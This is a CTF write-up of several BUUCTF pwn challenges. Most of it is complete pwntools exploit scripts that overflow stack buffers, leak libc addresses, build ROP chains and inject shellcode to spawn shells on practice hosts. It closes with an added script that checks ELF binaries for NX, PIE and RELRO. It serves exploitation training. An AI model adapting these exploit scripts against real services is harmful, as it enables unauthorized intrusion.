32 Problems: BUUCTF PWN Page 1 Writeup (Part 2)

[Figure: decompiled code showing the QWORD]

As the figure shows, the QWORD here stands for two bytes; setting var[17] to 17 is enough.
```python
from pwn import *

# p = process("./1")
p = remote("node4.buuoj.cn", 29946)
p.recv()
# 13 dwords of padding, then the value 0x11 (17) written into the target slot
payload = b'a'*13*4 + p64(0x11)
# payload = p32(17)*14
p.sendline(payload)
p.interactive()
```

jarvisoj_level2

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# p = remote('node4.buuoj.cn', 27484)
p = process('pwn')
elf = ELF('pwn')
p.recv()
# ret2text: 140 bytes of padding, then system("/bin/sh") with a dummy return address
payload = b'a'*140 + p32(elf.sym['system']) + p32(0) + p32(next(elf.search(b'/bin/sh\x00')))
p.sendline(payload)
p.interactive()
```

bjdctf_2020_babystack

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# p = process('pwn')
p = remote('node4.buuoj.cn', 27053)
elf = ELF('pwn')
p.recv()
# overwrite the saved return address with the backdoor function
payload = b'a'*24 + p64(elf.sym['backdoor'])
p.sendline(b'50')  # requested input length, large enough to overflow
p.recv()
p.sendline(payload)
p.interactive()
```

[OGeek2019]babyrop
[Figure: decompilation of main]
[Figure: decompilation of sub_804871F]
[Figure: decompilation of sub_80487D0]
An obvious ret2libc. First, the strncmp check has to be bypassed, which a terminating null byte does. Second, the number of bytes the second function writes into buf should be as large as possible, so buf[7] is overwritten; note that 127 is not enough here, it has to be set larger.

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# p = process('pwn')
p = remote('node4.buuoj.cn', 28494)
elf = ELF('pwn')

# leading NUL passes strncmp; buf[7] = 0xff makes the following read as long as possible
payload = b'\x00' + b'\xff'*7
p.sendline(payload)
p.recv()
# stage 1: leak puts@GOT through puts, then continue at 0x8048825 for the second stage
payload = b'a'*235 + p32(elf.sym['puts']) + p32(0x8048825) + p32(elf.got['puts'])
p.send(payload)
# libc addresses on this target end in 0xf7; take the last four bytes of the leak
puts_addr = u32(p.recvuntil(b'\xf7')[-4:])
print(hex(puts_addr))

libc = ELF('buu/libc-2.23.so')
libcbase = puts_addr - libc.sym['puts']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh\x00'))

# stage 2: same bypass, then system("/bin/sh")
payload = b'\x00' + b'\xff'*7
p.sendline(payload)
p.recv()
payload = b'a'*235 + p32(system) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()
```

get_started_3dsctf_2016

One pitfall: if the program is not made to finish by jumping to exit, it does not flush its output, so the flag is never printed to the screen.
```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# context(os='linux', arch='amd64')
# p = process('./1')
p = remote('node4.buuoj.cn', 27088)
elf = ELF('1')

exit_addr = elf.symbols['exit']
getflag_addr = elf.symbols['get_flag']
# call get_flag with its two expected arguments, returning into exit so stdout is flushed
payload = b'a'*56 + p32(getflag_addr) + p32(exit_addr) + p32(0x308CD64F) + p32(0x195719D1)
p.sendline(payload)
print(p.recv())
```

Another approach: use mprotect to write and execute shellcode. With mprotect we can mark a region of memory executable and then run shellcode from it. Note that the specified range must cover whole memory pages (4K): the start address must be the beginning of a page, and the length len must be a multiple of the page size. That is all it takes to make a range of addresses executable. Because the program is statically compiled, the addresses do not change. Since the range has to be a whole number of pages, we take 0x080eb000 as the start address, 0x1000 as the size, and 7 as prot. Then find a gadget that pops three times ("pop 3") to clean up the arguments:
[Figure: the pop 3 gadget]
So we construct the following payload:
[Figure: payload layout]
```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# context(os='linux', arch='amd64')
# p = process('./1')
p = remote('node4.buuoj.cn', 27088)
elf = ELF('1')

pop3_addr = 0x0806fc08           # pop; pop; pop; ret gadget
mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']
buf_addr = 0x080eb000            # page-aligned start of the region to make executable

payload = b'a'*56
# mprotect(buf_addr, 0x1000, 7); the pop3 gadget removes the three arguments
payload += p32(mprotect_addr) + p32(pop3_addr) + p32(buf_addr) + p32(0x1000) + p32(0x7)
# read(0, buf_addr, 0x100) to place the shellcode, again cleaned up by pop3
payload += p32(read_addr) + p32(pop3_addr) + p32(0) + p32(buf_addr) + p32(0x100)
# finally jump into the now-executable buffer
payload += p32(buf_addr)
p.sendline(payload)

shellcode = asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()
```

jarvisoj_level2_x64

ret2text on 64-bit:
```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# p = process('pwn')
p = remote('node4.buuoj.cn', 28941)
elf = ELF('pwn')

rdi = 0x4006b3  # pop rdi; ret
# 64-bit calling convention: first argument goes in rdi before calling system
payload = b'a'*0x88 + p64(rdi) + p64(next(elf.search(b'/bin/sh\x00'))) + p64(elf.sym['system'])
p.recv()
p.sendline(payload)
p.interactive()
```

[HarekazeCTF2019]baby_rop

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# p = process('pwn')
p = remote('node4.buuoj.cn', 27109)
elf = ELF('pwn')

rdi = 0x400683  # pop rdi; ret
payload = b'a'*0x18 + p64(rdi) + p64(next(elf.search(b'/bin/sh\x00'))) + p64(elf.sym['system'])
p.recv()
p.sendline(payload)
p.interactive()
```

ciscn_2019_en_2

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# p = process('pwn')
p = remote('node4.buuoj.cn', 29131)
elf = ELF('pwn')

ret = 0x4006b9  # ret, used to realign the stack before calling system
rdi = 0x400c83  # pop rdi; ret

p.recv()
p.sendline(b'1')
# stage 1: leak puts@GOT via puts, then return to main for a second pass
payload = b'\x00' + b'a'*0x57 + p64(rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
p.sendlineafter(b'Input your Plaintext to be encrypted\n', payload)
# user-space libc addresses end in 0x7f; keep the last six bytes and pad to eight
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# print(hex(puts_addr))

libc = ELF('buu/libc-2.27-x64.so')
libcbase = puts_addr - libc.sym['puts']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh\x00'))

p.recv()
p.sendline(b'1')
# stage 2: system("/bin/sh"), with an extra ret for 16-byte stack alignment
payload = b'\x00' + b'a'*0x57 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
p.sendlineafter(b'Input your Plaintext to be encrypted\n', payload)
p.interactive()
```
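Every exploit above depends on mitigations that the target does not have: fixed addresses (no PIE) for the gadgets and system/puts entries, a writable GOT (no full RELRO) for the leaks, and, in the get_started_3dsctf_2016 mprotect variant, a non-executable stack that forces the detour through mprotect. These facts are encoded in the ELF program headers, and the script below reads them directly, without pwntools. It is an added example, not code from the original writeup or from any of the challenge authors; the three ELF images it inspects are constructed in memory and only model the header layout of such binaries (the names and sample addresses are made up for the example, not taken from the real challenge files).

```python
"""Read NX / PIE / static-linking / RELRO facts straight from ELF program headers.

Added example for this writeup, not code from the original page or from any
challenge author. The ELF images are constructed in memory below and only
model the header layout of the challenge binaries; they are not the real files.
"""
import struct

ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4

# Header layouts (little-endian). Field order is identical for both classes;
# only the widths of e_entry / e_phoff / e_shoff differ.
EHDR_FMT = {64: "<16sHHIQQQIHHHHHH", 32: "<16sHHIIIIIHHHHHH"}
PHDR_FMT = {64: "<IIQQQQQQ", 32: "<8I"}  # 64-bit keeps p_flags 2nd, 32-bit 7th


def parse_elf(data: bytes) -> dict:
    """Return the ELF class, e_type and the list of program headers."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    bits = 64 if data[4] == 2 else 32
    hdr = struct.unpack_from(EHDR_FMT[bits], data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    phdrs = []
    for i in range(e_phnum):
        f = struct.unpack_from(PHDR_FMT[bits], data, e_phoff + i * e_phentsize)
        if bits == 64:
            p_type, p_flags, _, p_vaddr, _, _, p_memsz, _ = f
        else:
            p_type, _, p_vaddr, _, _, p_memsz, p_flags, _ = f
        phdrs.append({"type": p_type, "flags": p_flags, "vaddr": p_vaddr, "memsz": p_memsz})
    return {"bits": bits, "type": e_type, "phdrs": phdrs}


def hardening_report(data: bytes) -> dict:
    """Derive the mitigation facts the exploits in the writeup depend on."""
    elf = parse_elf(data)
    types = {p["type"] for p in elf["phdrs"]}
    stack = [p for p in elf["phdrs"] if p["type"] == PT_GNU_STACK]
    # Without PT_GNU_STACK the loader falls back to an executable stack; with it,
    # the stack is executable only if PF_X is set.
    nx = bool(stack) and not (stack[0]["flags"] & PF_X)
    return {
        "bits": elf["bits"],
        "nx": nx,
        # ET_DYN plus PT_INTERP is a PIE; ET_EXEC means fixed addresses for gadgets and GOT
        "pie": elf["type"] == ET_DYN,
        "static": PT_INTERP not in types and PT_DYNAMIC not in types,
        # PT_GNU_RELRO alone is partial RELRO; full RELRO also needs BIND_NOW in the dynamic section
        "relro": PT_GNU_RELRO in types,
        "wx_segments": [hex(p["vaddr"]) for p in elf["phdrs"]
                        if p["type"] == PT_LOAD and p["flags"] & PF_W and p["flags"] & PF_X],
    }


def build_elf(bits: int, e_type: int, phdrs) -> bytes:
    """Construct a header-only ELF image (constructed test data, not a real binary)."""
    ehsize, phentsize = (64, 56) if bits == 64 else (52, 32)
    ident = b"\x7fELF" + bytes([2 if bits == 64 else 1, 1, 1, 0]) + b"\x00" * 8
    machine = 0x3E if bits == 64 else 0x03  # EM_X86_64 / EM_386
    out = struct.pack(EHDR_FMT[bits], ident, e_type, machine, 1, 0, ehsize, 0, 0,
                      ehsize, phentsize, len(phdrs), 0, 0, 0)
    for p_type, p_flags, vaddr, memsz in phdrs:
        if bits == 64:
            out += struct.pack(PHDR_FMT[bits], p_type, p_flags, 0, vaddr, vaddr, memsz, memsz, 0x1000)
        else:
            out += struct.pack(PHDR_FMT[bits], p_type, 0, vaddr, vaddr, memsz, memsz, p_flags, 0x1000)
    return out


SAMPLES = {
    # modelled on a static, non-PIE 32-bit binary with NX (the mprotect case above)
    "static_nx_32": build_elf(32, ET_EXEC, [
        (PT_LOAD, PF_R | PF_X, 0x08048000, 0xA0000),
        (PT_LOAD, PF_R | PF_W, 0x080EB000, 0x3000),
        (PT_GNU_STACK, PF_R | PF_W, 0, 0),
    ]),
    # modelled on a modern dynamically linked PIE with NX and RELRO
    "pie_nx_relro_64": build_elf(64, ET_DYN, [
        (PT_INTERP, PF_R, 0x238, 0x1C),
        (PT_LOAD, PF_R | PF_X, 0, 0x1000),
        (PT_DYNAMIC, PF_R | PF_W, 0x200D80, 0x1F0),
        (PT_GNU_STACK, PF_R | PF_W, 0, 0),
        (PT_GNU_RELRO, PF_R, 0x200D80, 0x280),
    ]),
    # a deliberately weak image: executable stack and a writable+executable segment
    "execstack_32": build_elf(32, ET_EXEC, [
        (PT_LOAD, PF_R | PF_W | PF_X, 0x08048000, 0x2000),
        (PT_INTERP, PF_R, 0x08048134, 0x13),
        (PT_DYNAMIC, PF_R | PF_W, 0x08049F14, 0xE8),
        (PT_GNU_STACK, PF_R | PF_W | PF_X, 0, 0),
    ]),
}

if __name__ == "__main__":
    for name, image in SAMPLES.items():
        print(f"{name}: {hardening_report(image)}")
```

Run it on a real file by passing `open(path, "rb").read()` to `hardening_report`. The one property it cannot see is the stack canary, which lives in the symbol table (a reference to `__stack_chk_fail`) rather than in the program headers; that is why the fixed-offset overflows above also presuppose a binary compiled without stack protection.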
